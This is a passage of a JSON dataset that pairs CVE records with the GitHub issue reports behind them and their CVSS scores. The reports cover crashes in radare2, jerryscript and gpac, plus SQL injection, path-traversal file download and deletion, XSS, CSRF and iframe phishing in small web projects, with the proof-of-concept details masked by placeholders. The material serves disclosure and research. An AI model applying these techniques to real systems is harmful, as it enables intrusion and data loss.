  74653. "Issue_Created_At": "2021-12-07T22:50:34Z",
  74654. "description": "NULL pointer dereference in APITAG . NULL pointer dereference in APITAG I have discovered a NULL / Invalid pointer dereference bug, that gets triggered while parsing the symbols of a binary. Environment ERRORTAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG symbols ERRORTAG APITAG array, is an array of symbols for an object of the file that is being loaded for analysis. In case were the pointer APITAG APITAG APITAG APITAG sym variable will be set to APITAG APITAG bf ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me. FILETAG",
  74655. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74656. "severity": "MEDIUM",
  74657. "baseScore": 5.5,
  74658. "impactScore": 3.6,
  74659. "exploitabilityScore": 1.8
  74660. },
  74661. {
  74662. "CVE_ID": "CVE-2021-44975",
  74663. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/19476",
  74664. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/19476",
  74665. "Repo_new": "radareorg/radare2",
  74666. "Issue_Created_At": "2021-12-07T21:05:25Z",
  74667. "description": "Heap buffer overflow in function objc_build_refs while parsing mach o files. Heap Buffer overflow in objc_build_refs I have discovered a heap buffer overflow while parsing mach o executables. Please refer below for further information. Environment CODETAG ASAN Stack Trace from an ASAN build while triggering the bug ERRORTAG APITAG APITAG ERRORTAG APITAG and APITAG there's an attempt to sanitize the APITAG variable as it has to be done. Based on the return value of the two macros which is stored in the maxsize ERRORTAG buf ERRORTAG APITAG variable instead of the maxsize one. In case where the APITAG is greater than the maxsize APITAG maxsize ERRORTAG APITAG to be called with the variable maxsize instead of the APITAG ERRORTAG APITAG ` I would highly appreciate if that bug qualifies for a CVE for you to request it for me.",
  74668. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74669. "severity": "MEDIUM",
  74670. "baseScore": 5.5,
  74671. "impactScore": 3.6,
  74672. "exploitabilityScore": 1.8
  74673. },
  74674. {
  74675. "CVE_ID": "CVE-2021-44981",
  74676. "Issue_Url_old": "https://github.com/QuickBox/QB/issues/202",
  74677. "Issue_Url_new": "https://github.com/quickbox/qb/issues/202",
  74678. "Repo_new": "quickbox/qb",
  74679. "Issue_Created_At": "2021-12-09T10:22:21Z",
  74680. "description": "Responsible disclosure policy. Hey there! I belong to an open source security research community, and a member ( APITAG has found an issue, but doesn\u2019t know the best way to disclose it. If not a hassle, might you kindly add a APITAG file with an email, or another contact method? APITAG recommends URLTAG this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future. Thank you for your consideration, and I look forward to hearing from you! (cc APITAG helper)",
  74681. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  74682. "severity": "HIGH",
  74683. "baseScore": 8.8,
  74684. "impactScore": 5.9,
  74685. "exploitabilityScore": 2.8
  74686. },
  74687. {
  74688. "CVE_ID": "CVE-2021-44983",
  74689. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/10",
  74690. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/10",
  74691. "Repo_new": "taogogo/taocms",
  74692. "Issue_Created_At": "2021-12-10T02:25:30Z",
  74693. "description": "There is an arbitrary file download attack at \" File Management column\"(administrator authority). First, we enter the background and use the administrator admin we created: FILETAG Let's click \"file management\" on the left: FILETAG Then use Burp Suite and click Download to grab the request package FILETAG FILETAG Changing the \u201cpath\u201d parameter FILETAG",
  74694. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  74695. "severity": "MEDIUM",
  74696. "baseScore": 4.9,
  74697. "impactScore": 3.6,
  74698. "exploitabilityScore": 1.2
  74699. },
  74700. {
  74701. "CVE_ID": "CVE-2021-44988",
  74702. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4890",
  74703. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4890",
  74704. "Repo_new": "jerryscript-project/jerryscript",
  74705. "Issue_Created_At": "2021-12-09T14:27:01Z",
  74706. "description": "Stack overflow in ecma_lcache_lookup (ecma lcache.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  74707. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74708. "severity": "HIGH",
  74709. "baseScore": 7.8,
  74710. "impactScore": 5.9,
  74711. "exploitabilityScore": 1.8
  74712. },
  74713. {
  74714. "CVE_ID": "CVE-2021-44988",
  74715. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4891",
  74716. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4891",
  74717. "Repo_new": "jerryscript-project/jerryscript",
  74718. "Issue_Created_At": "2021-12-09T14:33:33Z",
  74719. "description": "Stack overflow in ecma_find_named_property (ecma helpers.c). APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Build steps ERRORTAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  74720. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74721. "severity": "HIGH",
  74722. "baseScore": 7.8,
  74723. "impactScore": 5.9,
  74724. "exploitabilityScore": 1.8
  74725. },
  74726. {
  74727. "CVE_ID": "CVE-2021-44992",
  74728. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4875",
  74729. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4875",
  74730. "Repo_new": "jerryscript-project/jerryscript",
  74731. "Issue_Created_At": "2021-12-09T09:08:53Z",
  74732. "description": "Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma typedarray APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Commit NUMBERTAG ba0d1b URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output Version NUMBERTAG ERRORTAG Version NUMBERTAG ERRORTAG `",
  74733. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74734. "severity": "MEDIUM",
  74735. "baseScore": 5.5,
  74736. "impactScore": 3.6,
  74737. "exploitabilityScore": 1.8
  74738. },
  74739. {
  74740. "CVE_ID": "CVE-2021-44993",
  74741. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4876",
  74742. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4876",
  74743. "Repo_new": "jerryscript-project/jerryscript",
  74744. "Issue_Created_At": "2021-12-09T09:48:50Z",
  74745. "description": "Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma get put value).. APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG \u200b Execution steps & Output version NUMBERTAG ERRORTAG",
  74746. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74747. "severity": "MEDIUM",
  74748. "baseScore": 5.5,
  74749. "impactScore": 3.6,
  74750. "exploitabilityScore": 1.8
  74751. },
  74752. {
  74753. "CVE_ID": "CVE-2021-44994",
  74754. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4894",
  74755. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4894",
  74756. "Repo_new": "jerryscript-project/jerryscript",
  74757. "Issue_Created_At": "2021-12-09T14:53:08Z",
  74758. "description": "Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size NUMBERTAG failed at PATHTAG (jmem_heap_finalize NUMBERTAG APITAG commit hash APITAG Build platform Ubuntu NUMBERTAG LTS Build steps ERRORTAG poc APITAG assert log ERRORTAG",
  74759. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74760. "severity": "MEDIUM",
  74761. "baseScore": 5.5,
  74762. "impactScore": 3.6,
  74763. "exploitabilityScore": 1.8
  74764. },
  74765. {
  74766. "CVE_ID": "CVE-2021-44994",
  74767. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4895",
  74768. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4895",
  74769. "Repo_new": "jerryscript-project/jerryscript",
  74770. "Issue_Created_At": "2021-12-09T14:58:57Z",
  74771. "description": "Assertion APITAG (obj_p)' failed at ecma APITAG APITAG revision Commit NUMBERTAG da NUMBERTAG URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case javascript \u200b Execution steps & Output ERRORTAG",
  74772. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74773. "severity": "MEDIUM",
  74774. "baseScore": 5.5,
  74775. "impactScore": 3.6,
  74776. "exploitabilityScore": 1.8
  74777. },
  74778. {
  74779. "CVE_ID": "CVE-2021-45014",
  74780. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/11",
  74781. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/11",
  74782. "Repo_new": "taogogo/taocms",
  74783. "Issue_Created_At": "2021-12-11T13:20:17Z",
  74784. "description": "There is SQL blind injection at APITAG article\". APITAG location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id The location of the vulnerability is line NUMBERTAG in PATHTAG and the incoming sql statement in the APITAG method does not use intval to process id FILETAG APITAG in to the background as the default account admin. FILETAG FILETAG APITAG can see action=cms&ctrl=update&id NUMBERTAG this id is the id in the update method in the FILETAG file FILETAG FILETAG FILETAG APITAG using the APITAG tool FILETAG",
  74785. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74786. "severity": "CRITICAL",
  74787. "baseScore": 9.8,
  74788. "impactScore": 5.9,
  74789. "exploitabilityScore": 3.9
  74790. },
  74791. {
  74792. "CVE_ID": "CVE-2021-45015",
  74793. "Issue_Url_old": "https://github.com/taogogo/taocms/issues/12",
  74794. "Issue_Url_new": "https://github.com/taogogo/taocms/issues/12",
  74795. "Repo_new": "taogogo/taocms",
  74796. "Issue_Created_At": "2021-12-11T13:39:25Z",
  74797. "description": "There is an arbitrary file delete vulnerability. APITAG location of the vulnerability is in PATHTAG from line NUMBERTAG to line NUMBERTAG and line NUMBERTAG to determine whether the incoming folder is empty. Delete the empty folder. If it is not empty, it will not be deleted, but the incoming folder will not be deleted. File filtering.. And / although it is not possible to delete non-empty folders, you can delete any file FILETAG APITAG a new file on disk d to delete it FILETAG APITAG the background to find the file management function and find a file to delete FILETAG FILETAG FILETAG in the D drive directory and successfully deleted, it proves that you can indeed use ../ to jump to the directory to operate any file, but you need to pay attention that for folders you can only delete empty folders FILETAG",
  74798. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  74799. "severity": "CRITICAL",
  74800. "baseScore": 9.1,
  74801. "impactScore": 5.2,
  74802. "exploitabilityScore": 3.9
  74803. },
  74804. {
  74805. "CVE_ID": "CVE-2021-45017",
  74806. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/8",
  74807. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/8",
  74808. "Repo_new": "xwlrbh/catfish",
  74809. "Issue_Created_At": "2021-12-12T03:23:30Z",
  74810. "description": "There is a csrf vulnerability in catfish APITAG FILETAG FILETAG FILETAG",
  74811. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  74812. "severity": "HIGH",
  74813. "baseScore": 8.8,
  74814. "impactScore": 5.9,
  74815. "exploitabilityScore": 2.8
  74816. },
  74817. {
  74818. "CVE_ID": "CVE-2021-45018",
  74819. "Issue_Url_old": "https://github.com/xwlrbh/Catfish/issues/9",
  74820. "Issue_Url_new": "https://github.com/xwlrbh/catfish/issues/9",
  74821. "Repo_new": "xwlrbh/catfish",
  74822. "Issue_Created_At": "2021-12-12T03:28:22Z",
  74823. "description": "There is a stored XSS vulnerability in catfish APITAG FILETAG FILETAG FILETAG",
  74824. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  74825. "severity": "MEDIUM",
  74826. "baseScore": 6.1,
  74827. "impactScore": 2.7,
  74828. "exploitabilityScore": 2.8
  74829. },
  74830. {
  74831. "CVE_ID": "CVE-2021-45092",
  74832. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/2",
  74833. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/2",
  74834. "Repo_new": "cybelesoft/virtualui",
  74835. "Issue_Created_At": "2021-12-13T17:17:14Z",
  74836. "description": "Vulnerability Improper Access Control. Dear Cybele Software, My name is Daniel Morales, from the IT Security Team of ARHS Spikeseed. I recently found a functionality in Thinfinity APITAG that could allow to a malicious actor to perform social engineering attacks such as phishing via the directory FILETAG reachable by default. How it works By accessing the following payload (URL) an attacker could iframe any external website (of course, only external endpoints that allows being iframed). The impact is a good phishing. Payload The vulnerable vector is \" FILETAG \" where \"vpath=//\" is the pointer to the external site to be iframed. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  74837. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  74838. "severity": "CRITICAL",
  74839. "baseScore": 9.8,
  74840. "impactScore": 5.9,
  74841. "exploitabilityScore": 3.9
  74842. },
  74843. {
  74844. "CVE_ID": "CVE-2021-45100",
  74845. "Issue_Url_old": "https://github.com/cifsd-team/ksmbd/issues/550",
  74846. "Issue_Url_new": "https://github.com/cifsd-team/ksmbd/issues/550",
  74847. "Repo_new": "cifsd-team/ksmbd",
  74848. "Issue_Created_At": "2021-12-15T01:44:51Z",
  74849. "description": "Plaintext connection despite encryption enabled. Hello. I am facing an error with the latest stable NUMBERTAG ersion, running on an APITAG machine. My configuration file is as follows: CODETAG Despite \"smb3 encryption\" set to yes, communications are still being made in plain text according to Wireshark. During the initial negotiation, both the client (a Windows NUMBERTAG machine running NUMBERTAG H1, compilation APITAG and the server agree on using NUMBERTAG and AES NUMBERTAG GCM: FILETAG On the session setup request, however, the client decides to no longer flag that it supports encryption, and thus requests a plain text connection for unknown reasons: FILETAG Worse still, ksmbd agrees and goes on, ignoring the request to enforce encryption and just sending data in plain text. The following screenshot displays a plain text ASCII message from opening a file which shouldn't be visible: FILETAG I am not sure if being made in plain text is an error on the Windows side or not, but at the very least ksmbd should probably deny connections if the user requested encryption in the settings. Attached here is a .zip file with a Wireshark log of the entire packet exchange, from the initial connection to the disconnection: FILETAG",
  74850. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  74851. "severity": "HIGH",
  74852. "baseScore": 7.5,
  74853. "impactScore": 3.6,
  74854. "exploitabilityScore": 3.9
  74855. },
  74856. {
  74857. "CVE_ID": "CVE-2021-45258",
  74858. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1970",
  74859. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1970",
  74860. "Repo_new": "gpac/gpac",
  74861. "Issue_Created_At": "2021-12-10T15:36:08Z",
  74862. "description": "Stack Overflow in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG CODETAG",
  74863. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74864. "severity": "MEDIUM",
  74865. "baseScore": 5.5,
  74866. "impactScore": 3.6,
  74867. "exploitabilityScore": 1.8
  74868. },
  74869. {
  74870. "CVE_ID": "CVE-2021-45259",
  74871. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1986",
  74872. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1986",
  74873. "Repo_new": "gpac/gpac",
  74874. "Issue_Created_At": "2021-12-14T02:57:15Z",
  74875. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG ERRORTAG",
  74876. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74877. "severity": "MEDIUM",
  74878. "baseScore": 5.5,
  74879. "impactScore": 3.6,
  74880. "exploitabilityScore": 1.8
  74881. },
  74882. {
  74883. "CVE_ID": "CVE-2021-45260",
  74884. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1979",
  74885. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1979",
  74886. "Repo_new": "gpac/gpac",
  74887. "Issue_Created_At": "2021-12-11T09:14:24Z",
  74888. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG gdb poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG poc NUMBERTAG CODETAG",
  74889. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74890. "severity": "MEDIUM",
  74891. "baseScore": 5.5,
  74892. "impactScore": 3.6,
  74893. "exploitabilityScore": 1.8
  74894. },
  74895. {
  74896. "CVE_ID": "CVE-2021-45262",
  74897. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1980",
  74898. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1980",
  74899. "Repo_new": "gpac/gpac",
  74900. "Issue_Created_At": "2021-12-11T09:14:52Z",
  74901. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb CODETAG APITAG ERRORTAG",
  74902. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74903. "severity": "MEDIUM",
  74904. "baseScore": 5.5,
  74905. "impactScore": 3.6,
  74906. "exploitabilityScore": 1.8
  74907. },
  74908. {
  74909. "CVE_ID": "CVE-2021-45263",
  74910. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1975",
  74911. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1975",
  74912. "Repo_new": "gpac/gpac",
  74913. "Issue_Created_At": "2021-12-11T01:07:09Z",
  74914. "description": "Invalid free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb ERRORTAG APITAG ERRORTAG",
  74915. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74916. "severity": "MEDIUM",
  74917. "baseScore": 5.5,
  74918. "impactScore": 3.6,
  74919. "exploitabilityScore": 1.8
  74920. },
  74921. {
  74922. "CVE_ID": "CVE-2021-45266",
  74923. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1985",
  74924. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1985",
  74925. "Repo_new": "gpac/gpac",
  74926. "Issue_Created_At": "2021-12-14T02:40:51Z",
  74927. "description": "Null Pointer Dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG APITAG APITAG ERRORTAG gdb APITAG APITAG APITAG CODETAG",
  74928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74929. "severity": "HIGH",
  74930. "baseScore": 7.5,
  74931. "impactScore": 3.6,
  74932. "exploitabilityScore": 3.9
  74933. },
  74934. {
  74935. "CVE_ID": "CVE-2021-45267",
  74936. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1965",
  74937. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1965",
  74938. "Repo_new": "gpac/gpac",
  74939. "Issue_Created_At": "2021-12-10T10:59:40Z",
  74940. "description": "Invalid memory address dereference in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG gdb ERRORTAG",
  74941. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74942. "severity": "MEDIUM",
  74943. "baseScore": 5.5,
  74944. "impactScore": 3.6,
  74945. "exploitabilityScore": 1.8
  74946. },
  74947. {
  74948. "CVE_ID": "CVE-2021-45288",
  74949. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1956",
  74950. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1956",
  74951. "Repo_new": "gpac/gpac",
  74952. "Issue_Created_At": "2021-12-10T07:28:18Z",
  74953. "description": "Double Free in APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ` Program received signal SIGABRT, Aborted. [ registers ] RA NUMBERTAG RB NUMBERTAG ffff NUMBERTAG ffff NUMBERTAG RC NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG RD NUMBERTAG RSI NUMBERTAG fffffff6fd NUMBERTAG RDI NUMBERTAG RBP NUMBERTAG fffffff NUMBERTAG ffff NUMBERTAG b NUMBERTAG RSP NUMBERTAG fffffff6fd NUMBERTAG RIP NUMBERTAG ffff NUMBERTAG d NUMBERTAG b ( APITAG : mov rax,QWORD PTR [rsp NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff6fd NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffff NUMBERTAG R NUMBERTAG R NUMBERTAG ffff7ffb NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG d NUMBERTAG f APITAG : mov edi NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : mov ea NUMBERTAG e NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : syscall NUMBERTAG ffff NUMBERTAG d NUMBERTAG b APITAG : mov rax,QWORD PTR [rsp NUMBERTAG ffff NUMBERTAG d NUMBERTAG APITAG : xor rax,QWORD PTR fs NUMBERTAG ffff NUMBERTAG d NUMBERTAG c APITAG : jne NUMBERTAG ffff NUMBERTAG d NUMBERTAG c4 APITAG NUMBERTAG ffff NUMBERTAG d NUMBERTAG e APITAG : mov eax,r8d NUMBERTAG ffff NUMBERTAG d NUMBERTAG a1 APITAG : add rsp NUMBERTAG stack NUMBERTAG fffffff6fd NUMBERTAG fffffff6fd NUMBERTAG fffffff6fe NUMBERTAG ffff6b0ffca APITAG mov rax,QWORD PTR [rsp NUMBERTAG fffffff6fe NUMBERTAG fffffff6ff NUMBERTAG fffffff6ff NUMBERTAG fffffff NUMBERTAG a NUMBERTAG fffffff NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. gdb peda$ bt NUMBERTAG GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __GI_abort () at APITAG NUMBERTAG ffff NUMBERTAG b3ee in __libc_message APITAG fmt=fmt APITAG \"%s \") at PATHTAG NUMBERTAG ffff NUMBERTAG c in malloc_printerr (str=str APITAG APITAG double free detected in tcache NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG ed in _int_free (a NUMBERTAG ffff NUMBERTAG b NUMBERTAG APITAG , p NUMBERTAG have_lock NUMBERTAG at APITAG NUMBERTAG ffff6bf NUMBERTAG f5 in gf_odf_del_default () from PATHTAG NUMBERTAG ffff6f NUMBERTAG in gf_sm_load_run_isom () from PATHTAG NUMBERTAG c3a NUMBERTAG in dump_isom_scene (file=<optimized out>, APITAG APITAG PATHTAG is_final_name=GF_FALSE, dump_mode=GF_SM_DUMP_BT, do_log=GF_FALSE, no_odf_conv=GF_FALSE) at APITAG NUMBERTAG edd0 in APITAG (argc=<optimized out>, argv=<optimized out>) at APITAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b3 in __libc_start_main (main NUMBERTAG d NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG d5be in _start () at APITAG gdb peda$ '''",
  74954. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74955. "severity": "MEDIUM",
  74956. "baseScore": 5.5,
  74957. "impactScore": 3.6,
  74958. "exploitabilityScore": 1.8
  74959. },
  74960. {
  74961. "CVE_ID": "CVE-2021-45289",
  74962. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1972",
  74963. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1972",
  74964. "Repo_new": "gpac/gpac",
  74965. "Issue_Created_At": "2021-12-10T16:55:48Z",
  74966. "description": "Program terminated with signal SIGKILL . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG GDB Information ERRORTAG",
  74967. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74968. "severity": "MEDIUM",
  74969. "baseScore": 5.5,
  74970. "impactScore": 3.6,
  74971. "exploitabilityScore": 1.8
  74972. },
  74973. {
  74974. "CVE_ID": "CVE-2021-45290",
  74975. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4383",
  74976. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4383",
  74977. "Repo_new": "webassembly/binaryen",
  74978. "Issue_Created_At": "2021-12-10T22:07:52Z",
  74979. "description": "An assertion abort in wasm::handle_unreachable(char const , char const , unsigned int) () . Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information ERRORTAG",
  74980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  74981. "severity": "HIGH",
  74982. "baseScore": 7.5,
  74983. "impactScore": 3.6,
  74984. "exploitabilityScore": 3.9
  74985. },
  74986. {
  74987. "CVE_ID": "CVE-2021-45291",
  74988. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1955",
  74989. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1955",
  74990. "Repo_new": "gpac/gpac",
  74991. "Issue_Created_At": "2021-12-10T06:46:26Z",
  74992. "description": "A segmentation fault in APITAG at APITAG . Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result ERRORTAG gdb information: ERRORTAG",
  74993. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  74994. "severity": "MEDIUM",
  74995. "baseScore": 5.5,
  74996. "impactScore": 3.6,
  74997. "exploitabilityScore": 1.8
  74998. },
  74999. {
  75000. "CVE_ID": "CVE-2021-45292",
  75001. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1958",
  75002. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1958",
  75003. "Repo_new": "gpac/gpac",
  75004. "Issue_Created_At": "2021-12-10T08:22:50Z",
  75005. "description": "A segmentation fault in gf_isom_hint_rtp_read () , APITAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG GDB information ERRORTAG",
  75006. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75007. "severity": "MEDIUM",
  75008. "baseScore": 5.5,
  75009. "impactScore": 3.6,
  75010. "exploitabilityScore": 1.8
  75011. },
  75012. {
  75013. "CVE_ID": "CVE-2021-45293",
  75014. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/4384",
  75015. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/4384",
  75016. "Repo_new": "webassembly/binaryen",
  75017. "Issue_Created_At": "2021-12-10T22:22:07Z",
  75018. "description": "Invalid memory address dereference in APITAG ). Version: APITAG System information Ubuntu NUMBERTAG LTS, clang version NUMBERTAG ubuntu1 command: APITAG FILETAG Result APITAG GDB information CODETAG",
  75019. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75020. "severity": "MEDIUM",
  75021. "baseScore": 5.5,
  75022. "impactScore": 3.6,
  75023. "exploitabilityScore": 1.8
  75024. },
  75025. {
  75026. "CVE_ID": "CVE-2021-45297",
  75027. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1973",
  75028. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1973",
  75029. "Repo_new": "gpac/gpac",
  75030. "Issue_Created_At": "2021-12-10T19:07:05Z",
